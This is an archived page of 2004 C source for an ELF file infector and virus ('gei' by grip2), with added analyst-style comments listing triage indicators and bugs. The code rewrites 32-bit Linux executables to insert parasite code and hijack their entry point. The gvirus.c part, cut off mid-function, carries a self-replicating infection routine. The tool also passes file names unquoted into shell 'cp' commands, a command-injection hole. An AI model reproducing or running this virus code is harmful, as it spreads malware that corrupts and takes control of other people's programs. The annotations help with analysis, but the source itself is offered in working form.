
📄 763.html

📁 里面收集的是发表在www.xfocus.org上的文章
<br />
/* <br />
* gei - ELF Infector v0.0.2 (2004) <br />
* written by grip2 &lt;gript2@hotmail.com&gt; <br />
*/ <br />
<br />
#include &lt;elf.h&gt; <br />
#include &lt;fcntl.h&gt; <br />
#include &lt;sys/stat.h&gt; <br />
#include &lt;sys/mman.h&gt; <br />
#include &lt;stdio.h&gt; <br />
#include &lt;unistd.h&gt; <br />
#include &lt;string.h&gt; <br />
#include &lt;stdlib.h&gt; <br />
<br />
#include &quot;gvirus.h&quot; <br />
<br />
/* Granularity used for the inserted block: one 4096-byte page. */ <br />
#define PAGE_SIZE 4096 <br />
/* Round a up to the next multiple of PAGE_SIZE (a itself if already aligned). */ <br />
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) &amp; ~(PAGE_SIZE - 1)) <br />
<br />
/* Forward declaration; the definition follows main() and documents the <br />
 * parameters. Returns 0 on success and -1 on failure. */ <br />
static int elf_infect(const char *filename, <br />
void *para_code, <br />
unsigned int para_code_size, <br />
unsigned long retaddr_addr_offset); <br />
<br />
/* <br />
 * Entry point of the gei tool. Takes exactly one argument: either "-l", <br />
 * which prints the parasite code length, or the path of the file that is <br />
 * handed to elf_infect(). Returns 0 only when elf_infect() succeeds and 1 <br />
 * in every other case. <br />
 * <br />
 * Analyst notes: <br />
 *   - A copy named .backup.NAME is made in the current directory before the <br />
 *     target is touched. Nothing here removes it on success, so it stays <br />
 *     behind as an artifact that still holds the original bytes. <br />
 *   - Both cp commands are built with sprintf() and run through system() with <br />
 *     argv[1] pasted in unquoted, so the shell parses the file name. <br />
 */ <br />
int main(int argc, char *argv[]) <br />
{ <br />
#define MAX_FILENAME_LEN 256 <br />
/* Each command holds the name twice plus fixed text; 4x the name limit is ample. */ <br />
char backup[MAX_FILENAME_LEN*4]; <br />
char restore[MAX_FILENAME_LEN*4]; <br />
<br />
if (argc != 2) { <br />
fprintf(stderr, <br />
&quot;gei - ELF Infector v0.0.2 written by grip2 &lt;gript2@hotmail.com&gt;\n&quot;); <br />
fprintf(stderr, &quot;Usage: %s &lt;elf-exec-file&gt;\n&quot;, argv[0]); <br />
return 1; <br />
} <br />
<br />
/* "-l" only reports the size of the embedded code, taken as the distance <br />
 * between the two symbols declared in gvirus.h. <br />
 * NOTE(review): the operands are function addresses and the difference is <br />
 * printed with %d; this relies on compiler extensions. */ <br />
if (strcmp(argv[1], &quot;-l&quot;) == 0) { <br />
fprintf(stderr, &quot;Parasite code length: %d\n&quot;, <br />
&amp;parasite_code_end - &amp;parasite_code); <br />
return 1; <br />
} <br />
<br />
/* Length guard that keeps the sprintf() calls below inside their buffers. */ <br />
if (strlen(argv[1]) &gt; MAX_FILENAME_LEN) { <br />
fprintf(stderr, &quot;filename too long!\n&quot;); <br />
return 1; <br />
} <br />
<br />
/* The name is inserted into the command text as-is (no quoting or escaping). */ <br />
sprintf(backup, &quot;cp -f %s .backup.%s\n&quot;, argv[1], argv[1]); <br />
sprintf(restore, &quot;cp -f .backup.%s %s\n&quot;, argv[1], argv[1]); <br />
<br />
/* The result of the backup command is not checked before the target is modified. */ <br />
system(backup); <br />
if (elf_infect(argv[1], &amp;parasite_code, <br />
&amp;parasite_code_end - &amp;parasite_code, <br />
PARACODE_RETADDR_ADDR_OFFSET) &lt; 0) { <br />
/* elf_infect() edits headers through a shared mapping, so a failed run can <br />
 * leave the target half-modified; the backup is copied back over it. */ <br />
system(restore); <br />
return 1; <br />
} <br />
<br />
return 0; <br />
} <br />
<br />
/* <br />
 * elf_infect - insert para_code into the ELF executable at filename. <br />
 * <br />
 * filename: path of the target; opened O_RDWR and finally replaced by rename(). <br />
 * para_code, para_code_size: the bytes to insert and their length. <br />
 * retaddr_addr_offset: byte offset inside the inserted code where the <br />
 *     original e_entry value is stored. <br />
 * Returns 0 on success, -1 on any failure (after the cleanup at err:). <br />
 * <br />
 * Only 32-bit little-endian ET_EXEC files for EM_386 pass the header check. <br />
 * The inserted block is padded to a whole page and placed in the file directly <br />
 * after the first PT_LOAD segment whose flags are exactly PF_R|PF_X. <br />
 * <br />
 * What a modified file looks like (useful for triage): <br />
 *   - e_entry equals the old end of that segment (p_vaddr + old p_filesz) <br />
 *     rather than an address inside the original code; <br />
 *   - the segment's p_filesz and p_memsz have grown by a multiple of 4096; <br />
 *   - e_shoff and every later p_offset / sh_offset are shifted by the same amount; <br />
 *   - the section header preceding the first shifted one has a larger sh_size; <br />
 *   - the file was rebuilt in a temp file and renamed into place, so the path <br />
 *     now refers to a different inode than before. <br />
 */ <br />
static int elf_infect(const char *filename, <br />
void *para_code, <br />
unsigned int para_code_size, <br />
unsigned long retaddr_addr_offset) <br />
{ <br />
int fd = -1; <br />
int tmp_fd = -1; <br />
Elf32_Ehdr *ehdr = NULL; <br />
Elf32_Phdr *phdr; <br />
Elf32_Shdr *shdr; <br />
int i; <br />
int txt_index; <br />
struct stat stat; <br />
int align_code_size; <br />
unsigned long org_entry; <br />
void *new_code_pos; <br />
int tmp_flag; <br />
int size; <br />
/* One-page staging buffer for the inserted block; it is not initialised. */ <br />
unsigned char tmp_para_code[PAGE_SIZE]; <br />
<br />
/* Only a name is generated here; the file itself is created by open() below. <br />
 * The returned string is never freed in this function. <br />
 * NOTE(review): tempnam(3) documents a prefix of at most five bytes, so the <br />
 * on-disk name presumably starts with "infec" - confirm on the libc in use. */ <br />
char *tmpfile; <br />
tmpfile = tempnam(NULL, &quot;infector&quot;); <br />
<br />
fd = open(filename, O_RDWR); <br />
if (fd == -1) { <br />
perror(filename); <br />
goto err; <br />
} <br />
<br />
if (fstat(fd, &amp;stat) == -1) { <br />
perror(&quot;fstat&quot;); <br />
goto err; <br />
} <br />
<br />
#ifndef NDEBUG <br />
printf(&quot;file size: %lu\n&quot;, stat.st_size); <br />
#endif <br />
<br />
/* MAP_SHARED with PROT_WRITE: the header edits made further down are also <br />
 * written to the original file, not only to the copy assembled later. */ <br />
ehdr = mmap(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); <br />
if (ehdr == MAP_FAILED) { <br />
perror(&quot;mmap ehdr&quot;); <br />
goto err; <br />
} <br />
<br />
/* Check ELF magic-ident, then class, byte order, file type and machine. <br />
 * Anything other than a 32-bit LSB ET_EXEC for EM_386 is rejected. */ <br />
if (ehdr-&gt;e_ident[EI_MAG0] != 0x7f <br />
|| ehdr-&gt;e_ident[EI_MAG1] != &#39;E&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG2] != &#39;L&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG3] != &#39;F&#39; <br />
|| ehdr-&gt;e_ident[EI_CLASS] != ELFCLASS32 <br />
|| ehdr-&gt;e_ident[EI_DATA] != ELFDATA2LSB <br />
|| ehdr-&gt;e_ident[EI_VERSION] != EV_CURRENT <br />
|| ehdr-&gt;e_type != ET_EXEC <br />
|| ehdr-&gt;e_machine != EM_386 <br />
|| ehdr-&gt;e_version != EV_CURRENT <br />
) { <br />
fprintf(stderr, &quot;File type not supported\n&quot;); <br />
goto err; <br />
} <br />
<br />
#ifndef NDEBUG <br />
printf(&quot;e_phoff: %08x\ne_shoff: %08x\n&quot;, <br />
ehdr-&gt;e_phoff, ehdr-&gt;e_shoff); <br />
printf(&quot;e_phentsize: %08x\n&quot;, ehdr-&gt;e_phentsize); <br />
printf(&quot;e_phnum: %08x\n&quot;, ehdr-&gt;e_phnum); <br />
printf(&quot;e_shentsize: %08x\n&quot;, ehdr-&gt;e_shentsize); <br />
printf(&quot;e_shnum: %08x\n&quot;, ehdr-&gt;e_shnum); <br />
#endif <br />
<br />
/* The block is always inserted as whole pages. */ <br />
align_code_size = PAGE_ALIGN(para_code_size); <br />
<br />
/* Get program header and section header start address. <br />
 * e_phoff and e_shoff are used as found in the file; neither is compared <br />
 * against stat.st_size before the tables are read and written. */ <br />
phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr-&gt;e_phoff); <br />
shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr-&gt;e_shoff); <br />
<br />
/* Locate the text segment: the first PT_LOAD entry with flags exactly R|X. <br />
 * The search gives up on reaching the last entry, so phdr[txt_index+1] always <br />
 * exists when it is read. */ <br />
txt_index = 0; <br />
while (1) { <br />
if (txt_index == ehdr-&gt;e_phnum - 1) { <br />
fprintf(stderr, &quot;Invalid e_phnum, text segment not found.\n&quot;); <br />
goto err; <br />
} <br />
if (phdr[txt_index].p_type == PT_LOAD <br />
&amp;&amp; phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */ <br />
#ifndef NDEBUG <br />
printf(&quot;text segment file offset: %u\n&quot;, phdr[txt_index].p_offset); <br />
#endif <br />
/* The padded block must fit in the address gap between the end of this <br />
 * segment and the p_vaddr of the next program header entry. */ <br />
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size <br />
&gt; phdr[txt_index+1].p_vaddr) { <br />
fprintf(stderr, &quot;Better luck next file :-)\n&quot;); <br />
goto err; <br />
} <br />
<br />
break; <br />
} <br />
txt_index++; <br />
} <br />
<br />
/* Modify the entry point of the ELF: remember the original value and point <br />
 * e_entry at the old end of the text segment, where the block will live. */ <br />
org_entry = ehdr-&gt;e_entry; <br />
ehdr-&gt;e_entry = phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz; <br />
<br />
/* Address inside the mapping that corresponds to the insertion point. It must <br />
 * be computed before p_filesz is enlarged below. */ <br />
new_code_pos = <br />
(void *) ehdr + phdr[txt_index].p_offset + phdr[txt_index].p_filesz; <br />
<br />
/* Increase the p_filesz and p_memsz of text segment <br />
* for new code */ <br />
phdr[txt_index].p_filesz += align_code_size; <br />
phdr[txt_index].p_memsz += align_code_size; <br />
<br />
/* Every segment stored at or after the insertion point moves down the file. */ <br />
for (i = 0; i &lt; ehdr-&gt;e_phnum; i++) <br />
if (phdr[i].p_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) <br />
phdr[i].p_offset += align_code_size; <br />
<br />
/* Same shift for the sections. tmp_flag makes sure only one section, the one <br />
 * just before the first shifted section, has its size enlarged. */ <br />
tmp_flag = 0; <br />
for (i = 0; i &lt; ehdr-&gt;e_shnum; i++) { <br />
if (shdr[i].sh_offset &gt;= (unsigned long) new_code_pos - (unsigned long) ehdr) { <br />
shdr[i].sh_offset += align_code_size; <br />
if (!tmp_flag &amp;&amp; i) { /* associating the new_code to the last <br />
* section in the text segment */ <br />
shdr[i-1].sh_size += align_code_size; <br />
tmp_flag = 1; <br />
/* Printed in every build (not guarded by NDEBUG); the number is the index <br />
 * of the enlarged section, not a count. */ <br />
printf(&quot;[%d sections patched]\n&quot;, i-1); <br />
} <br />
} <br />
} <br />
<br />
/* Increase e_shoff in the ELF header */ <br />
ehdr-&gt;e_shoff += align_code_size; <br />
<br />
/* Make a new file. It is opened with the original's st_mode as the creation <br />
 * mode and without O_EXCL or O_TRUNC. */ <br />
tmp_fd = open(tmpfile, O_WRONLY|O_CREAT, stat.st_mode); <br />
if (tmp_fd == -1) { <br />
perror(&quot;open&quot;); <br />
goto err; <br />
} <br />
<br />
/* Part 1: everything up to the insertion point, headers already patched. */ <br />
size = new_code_pos - (void *) ehdr; <br />
if (write(tmp_fd, ehdr, size) != size) { <br />
perror(&quot;write&quot;); <br />
goto err; <br />
} <br />
<br />
/* Part 2: the inserted block, with the saved entry point stored at <br />
 * retaddr_addr_offset. align_code_size bytes are written, so the padding <br />
 * after para_code_size is whatever the uninitialised buffer held. <br />
 * NOTE(review): para_code_size is never compared with PAGE_SIZE, the size of <br />
 * tmp_para_code. */ <br />
memcpy(tmp_para_code, para_code, para_code_size); <br />
memcpy(tmp_para_code + retaddr_addr_offset, <br />
&amp;org_entry, sizeof(org_entry)); <br />
if (write(tmp_fd, tmp_para_code, align_code_size) != align_code_size) { <br />
perror(&quot;write&quot;); <br />
goto err; <br />
} <br />
<br />
/* Part 3: the rest of the original file, unchanged apart from the header <br />
 * tables patched above. */ <br />
if (write(tmp_fd, (void *) ehdr + size, stat.st_size - size) <br />
!= stat.st_size - size) { <br />
perror(&quot;write&quot;); <br />
goto err; <br />
} <br />
<br />
close(tmp_fd); <br />
munmap(ehdr, stat.st_size); <br />
close(fd); <br />
<br />
/* Replace the target with the rebuilt file. <br />
 * NOTE(review): on failure this jumps to err: although tmp_fd, the mapping <br />
 * and fd were released just above, so they are released a second time. */ <br />
if (rename(tmpfile, filename) == -1) { <br />
perror(&quot;rename&quot;); <br />
goto err; <br />
} <br />
<br />
return 0; <br />
err: <br />
/* Common cleanup. The temp file, if created, is not unlinked here. <br />
 * NOTE(review): after a failed mmap ehdr is MAP_FAILED, which is non-NULL, <br />
 * so munmap() is still called. */ <br />
if (tmp_fd != -1) <br />
close(tmp_fd); <br />
if (ehdr) <br />
munmap(ehdr, stat.st_size); <br />
if (fd != -1) <br />
close(fd); <br />
return -1; <br />
} <br />
------------------------------ g-elf_infector.c ------------------------------ <br />
<br />
------------------------------ gvirus.h ------------------------------ <br />
/* Include guard. NOTE(review): names starting with an underscore followed by <br />
 * an upper-case letter are reserved for the implementation. */ <br />
#ifndef _G2_PARASITE_CODE_ <br />
#define _G2_PARASITE_CODE_ <br />
<br />
/* Byte offset, inside the parasite code, of the slot that receives the host's <br />
 * original entry point; g-elf_infector.c passes it to elf_infect() as <br />
 * retaddr_addr_offset. The value differs between debug builds (NDEBUG not <br />
 * defined) and release builds. These are fixed numbers, so they presumably <br />
 * have to match the compiled layout of the code - TODO confirm. */ <br />
#ifndef NDEBUG <br />
#define PARACODE_RETADDR_ADDR_OFFSET 1704 <br />
#else <br />
#define PARACODE_RETADDR_ADDR_OFFSET 1232 <br />
#endif <br />
<br />
/* Declared as functions, but g-elf_infector.c only takes their addresses: <br />
 * parasite_code as the start of the block to insert, and the distance to <br />
 * parasite_code_end as its length. */ <br />
void parasite_code(void); <br />
void parasite_code_end(void); <br />
<br />
#endif <br />
------------------------------ gvirus.h ------------------------------ <br />
<br />
------------------------------ gvirus.c ------------------------------ <br />
<br />
/* <br />
* virus code in C (2004) <br />
* written by grip2 &lt;gript2@hotmail.com&gt; <br />
*/ <br />
<br />
#include &quot;gsyscall.h&quot; <br />
#include &quot;gvirus.h&quot; <br />
#include &lt;elf.h&gt; <br />
<br />
/* Same page constants as in g-elf_infector.c. */ <br />
#define PAGE_SIZE 4096 <br />
/* Round a up to the next multiple of PAGE_SIZE. */ <br />
#define PAGE_ALIGN(a) (((a) + PAGE_SIZE - 1) &amp; ~(PAGE_SIZE - 1)) <br />
<br />
/* Fixed length constant with one value per build flavour. It is not used in <br />
 * the part of the file shown here; presumably the size of the compiled <br />
 * parasite code - TODO confirm against its use further down. */ <br />
#ifndef NDEBUG <br />
#define PARACODE_LENGTH 1744 <br />
#else <br />
#define PARACODE_LENGTH 1248 <br />
#endif <br />
<br />
/* Debug output helper: forwards its arguments to g_write() when NDEBUG is not <br />
 * defined and expands to nothing otherwise. g_write is not defined in this <br />
 * file (presumably it comes from gsyscall.h). */ <br />
#ifndef NDEBUG <br />
#define V_DEBUG_WRITE(...) \ <br />
do {\ <br />
g_write(__VA_ARGS__);\ <br />
} while(0) <br />
#else <br />
#define V_DEBUG_WRITE(...) <br />
#endif <br />
<br />
static inline int infect_virus( <br />
const char *file, <br />
void *v_code, <br />
unsigned int v_code_size, <br />
unsigned long v_retaddr_addr_offset) <br />
{ <br />
int fd = -1; <br />
int tmp_fd = -1; <br />
Elf32_Ehdr *ehdr = NULL; <br />
Elf32_Phdr *phdr; <br />
Elf32_Shdr *shdr; <br />
int i; <br />
int txt_index; <br />
struct stat stat; <br />
int align_code_size; <br />
unsigned long org_entry; <br />
void *new_code_pos; <br />
int tmp_flag; <br />
int size; <br />
unsigned char tmp_v_code[PAGE_SIZE]; <br />
<br />
char tmpfile[32] = {&#39;/&#39;,&#39;t&#39;,&#39;m&#39;,&#39;p&#39;,&#39;/&#39;,&#39;.&#39;,&#39;g&#39;,&#39;v&#39;,&#39;i&#39;,&#39;r&#39;,&#39;u&#39;,&#39;s&#39;,&#39;\0&#39;}; <br />
<br />
#ifndef NDEBUG <br />
char err_type[32] = {&#39;f&#39;,&#39;i&#39;,&#39;l&#39;,&#39;e&#39;,&#39; &#39;,&#39;t&#39;,&#39;y&#39;,&#39;p&#39;,&#39;e&#39;,&#39; &#39;,&#39;n&#39;,&#39;o&#39;,&#39;t&#39;,&#39; &#39;, <br />
&#39;s&#39;,&#39;u&#39;,&#39;p&#39;,&#39;p&#39;,&#39;o&#39;,&#39;r&#39;,&#39;t&#39;,&#39;e&#39;,&#39;d&#39;,&#39;\n&#39;,&#39;\0&#39;}; <br />
char luck[32] = {&#39;B&#39;,&#39;e&#39;,&#39;t&#39;,&#39;t&#39;,&#39;e&#39;,&#39;r&#39;,&#39; &#39;,&#39;l&#39;,&#39;u&#39;,&#39;c&#39;,&#39;k&#39;,&#39; &#39;, <br />
&#39;n&#39;,&#39;e&#39;,&#39;x&#39;,&#39;t&#39;,&#39; &#39;,&#39;f&#39;,&#39;i&#39;,&#39;l&#39;,&#39;e&#39;,&#39;\n&#39;,&#39;\0&#39;}; <br />
#endif <br />
<br />
fd = g_open(file, O_RDWR, 0); <br />
if (fd == -1) { <br />
goto err; <br />
} <br />
<br />
if (g_fstat(fd, &amp;stat) == -1) { <br />
goto err; <br />
} <br />
<br />
ehdr = g_mmap2(0, stat.st_size, PROT_WRITE|PROT_READ, MAP_SHARED, fd, 0); <br />
if (ehdr == MAP_FAILED) { <br />
goto err; <br />
} <br />
<br />
/* Check ELF magic-ident */ <br />
if (ehdr-&gt;e_ident[EI_MAG0] != 0x7f <br />
|| ehdr-&gt;e_ident[EI_MAG1] != &#39;E&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG2] != &#39;L&#39; <br />
|| ehdr-&gt;e_ident[EI_MAG3] != &#39;F&#39; <br />
|| ehdr-&gt;e_ident[EI_CLASS] != ELFCLASS32 <br />
|| ehdr-&gt;e_ident[EI_DATA] != ELFDATA2LSB <br />
|| ehdr-&gt;e_ident[EI_VERSION] != EV_CURRENT <br />
|| ehdr-&gt;e_type != ET_EXEC <br />
|| ehdr-&gt;e_machine != EM_386 <br />
|| ehdr-&gt;e_version != EV_CURRENT <br />
) { <br />
V_DEBUG_WRITE(1, &amp;err_type, sizeof(err_type)); <br />
goto err; <br />
} <br />
<br />
align_code_size = PAGE_ALIGN(v_code_size); <br />
<br />
/* Get program header and section header start address */ <br />
phdr = (Elf32_Phdr *) ((unsigned long) ehdr + ehdr-&gt;e_phoff); <br />
shdr = (Elf32_Shdr *) ((unsigned long) ehdr + ehdr-&gt;e_shoff); <br />
<br />
/* Locate the text segment */ <br />
txt_index = 0; <br />
while (1) { <br />
if (txt_index == ehdr-&gt;e_phnum - 1) <br />
goto err; <br />
<br />
if (phdr[txt_index].p_type == PT_LOAD <br />
&amp;&amp; phdr[txt_index].p_flags == (PF_R|PF_X)) { /* text segment */ <br />
if (phdr[txt_index].p_vaddr + phdr[txt_index].p_filesz + align_code_size <br />
